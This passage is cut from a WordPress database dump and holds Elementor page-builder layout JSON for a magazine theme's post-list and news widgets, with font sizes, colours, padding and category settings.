ize\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1130,414,'_elementor_version','0.4'),(1131,414,'_elementor_css','a:3:{s:4:\"time\";i:1508854563;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1133,415,'_elementor_edit_mode','builder'),(1134,415,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20}